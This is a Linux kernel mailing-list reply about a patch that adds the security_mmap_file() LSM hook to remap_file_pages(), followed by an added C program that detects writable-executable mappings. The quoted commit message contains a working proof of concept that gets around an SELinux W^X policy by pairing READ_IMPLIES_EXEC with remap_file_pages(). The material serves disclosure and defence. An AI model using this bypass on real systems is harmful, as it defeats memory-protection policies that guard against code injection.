From: Paul Moore
Date: Thu, 19 Sep 2024 04:13:54 -0400
Subject: Re: [PATCH] mm: call the security_mmap_file() LSM hook in remap_file_pages()
To: linux-security-module@vger.kernel.org, linux-mm@kvack.org, selinux@vger.kernel.org
Cc: ebpqwerty472123@gmail.com
In-Reply-To: <20240919080905.4506-2-paul@paul-moore.com>
References: <20240919080905.4506-2-paul@paul-moore.com>

On Thu, Sep 19, 2024 at 4:09 AM Paul Moore wrote:
>
> From: Shu Han
>
> The remap_file_pages syscall handler calls do_mmap() directly, which
> doesn't contain the LSM security check. And if the process has called
> personality(READ_IMPLIES_EXEC) before and remap_file_pages() is called for
> RW pages, this will actually result in remapping the pages to RWX,
> bypassing a W^X policy enforced by SELinux.
>
> So we should check prot by security_mmap_file LSM hook in the
> remap_file_pages syscall handler before do_mmap() is called. Otherwise, it
> potentially permits an attacker to bypass a W^X policy enforced by
> SELinux.
>
> The bypass is similar to CVE-2016-10044, which bypasses the same thing via
> AIO and can be found in [1].
>
> The PoC:
>
> $ cat > test.c
>
> #include <fcntl.h>
> #include <sys/mman.h>
> #include <sys/personality.h>
> #include <sys/syscall.h>
> #include <unistd.h>
>
> int main(void) {
>         size_t pagesz = sysconf(_SC_PAGE_SIZE);
>         int mfd = syscall(SYS_memfd_create, "test", 0);
>         const char *buf = mmap(NULL, 4 * pagesz, PROT_READ | PROT_WRITE,
>                 MAP_SHARED, mfd, 0);
>         unsigned int old = syscall(SYS_personality, 0xffffffff);
>         syscall(SYS_personality, READ_IMPLIES_EXEC | old);
>         syscall(SYS_remap_file_pages, buf, pagesz, 0, 2, 0);
>         syscall(SYS_personality, old);
>         // show the RWX page exists even if W^X policy is enforced
>         int fd = open("/proc/self/maps", O_RDONLY);
>         unsigned char buf2[1024];
>         while (1) {
>                 int ret = read(fd, buf2, 1024);
>                 if (ret <= 0) break;
>                 write(1, buf2, ret);
>         }
>         close(fd);
> }
>
> $ gcc test.c -o test
> $ ./test | grep rwx
> 7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)
>
> Link: https://project-zero.issues.chromium.org/issues/42452389 [1]
> Cc: stable@vger.kernel.org
> Signed-off-by: Shu Han
> Acked-by: Stephen Smalley
> [PM: subject line tweaks]
> Signed-off-by: Paul Moore
> ---
>  mm/mmap.c | 4 ++++
>  1 file changed, 4 insertions(+)

I've just merged this into the lsm/stable-6.12 branch and plan to send
this to Linus shortly.

-- 
paul-moore.com
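The commit message quoted above makes two points a defender wants to see concretely: how the READ_IMPLIES_EXEC personality bit widens an RW request into RWX, and what such a mapping looks like in /proc/<pid>/maps. The program below is an added example written for this page; it is not Shu Han's PoC, Paul Moore's code, or kernel code. effective_prot() is a simplified model of the kernel's prot widening (it deliberately omits the noexec-mount exception the real kernel applies), and sample_maps is a constructed buffer in which only the rwxs memfd line is taken from the PoC output quoted above. It parses maps lines and reports every mapping that is both writable and executable, which is the audit the PoC's "grep rwx" approximates.

```c
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#ifdef __linux__
#include <sys/personality.h>
#endif

/* Linux value of the personality bit; fallback for non-glibc headers. */
#ifndef READ_IMPLIES_EXEC
#define READ_IMPLIES_EXEC 0x0400000
#endif

/* Simplified model (not kernel code) of the widening described in the
 * commit message: with READ_IMPLIES_EXEC set, any readable request also
 * becomes executable, so PROT_READ|PROT_WRITE turns into RWX. */
static int effective_prot(int requested, unsigned long persona)
{
    if ((requested & PROT_READ) && (persona & READ_IMPLIES_EXEC))
        return requested | PROT_EXEC;
    return requested;
}

/* A mapping violates W^X when it is writable and executable at once. */
static int violates_wx(int prot)
{
    return ((prot & PROT_WRITE) && (prot & PROT_EXEC)) ? 1 : 0;
}

/* Parse one /proc/<pid>/maps line ("start-end perms offset dev inode [path]").
 * Returns 1 if the perms field has both 'w' and 'x', 0 if not, -1 if the
 * line does not parse as a maps entry. */
static int maps_line_is_wx(const char *line)
{
    unsigned long start, end;
    char perms[5];

    if (sscanf(line, "%lx-%lx %4s", &start, &end, perms) != 3)
        return -1;
    if (end <= start || strlen(perms) != 4)
        return -1;
    return (perms[1] == 'w' && perms[2] == 'x') ? 1 : 0;
}

/* Walk a NUL-terminated maps buffer line by line, print each W^X mapping
 * to out (when out is non-NULL) and return how many were found. */
static int report_wx_mappings(FILE *out, const char *maps)
{
    int count = 0;
    const char *p = maps;

    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];

        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (maps_line_is_wx(line) == 1) {
            count++;
            if (out)
                fprintf(out, "W^X violation: %s\n", line);
        }
        if (!nl)
            break;
        p = nl + 1;
    }
    return count;
}

/* Constructed sample: benign entries plus the rwxs memfd line from the PoC
 * output quoted in the commit message. */
static const char sample_maps[] =
    "5598d7f4c000-5598d7f4d000 r--p 00000000 08:01 1234 /usr/bin/test\n"
    "5598d7f4d000-5598d7f4e000 r-xp 00001000 08:01 1234 /usr/bin/test\n"
    "7f1836c32000-7f1836c34000 rw-s 00000000 00:01 2050 /memfd:test (deleted)\n"
    "7f1836c34000-7f1836c35000 rwxs 00002000 00:01 2050 /memfd:test (deleted)\n"
    "7ffd1d3e0000-7ffd1d401000 rw-p 00000000 00:00 0 [stack]\n";

int main(void)
{
    static char live[1 << 16];
    int rw = PROT_READ | PROT_WRITE;
    FILE *f;

    printf("RW request under READ_IMPLIES_EXEC -> %s\n",
           violates_wx(effective_prot(rw, READ_IMPLIES_EXEC))
               ? "RWX (W^X violation)" : "RW");
    printf("constructed sample: %d W^X mapping(s)\n",
           report_wx_mappings(stdout, sample_maps));

    /* Audit the running process itself (Linux only; skipped elsewhere). */
    f = fopen("/proc/self/maps", "r");
    if (f) {
        size_t n = fread(live, 1, sizeof live - 1, f);
        live[n] = '\0';
        fclose(f);
        printf("this process: %d W^X mapping(s)\n",
               report_wx_mappings(stdout, live));
    }
    return 0;
}
```

The perms check deliberately ignores the fourth character, so shared (`rwxs`) and private (`rwxp`) mappings are both reported; the PoC's mapping is shared because the memfd was mapped with MAP_SHARED. Run against a live process, a non-zero count is the signal that some path created an executable writable mapping, whether through the remap_file_pages() gap fixed here or otherwise.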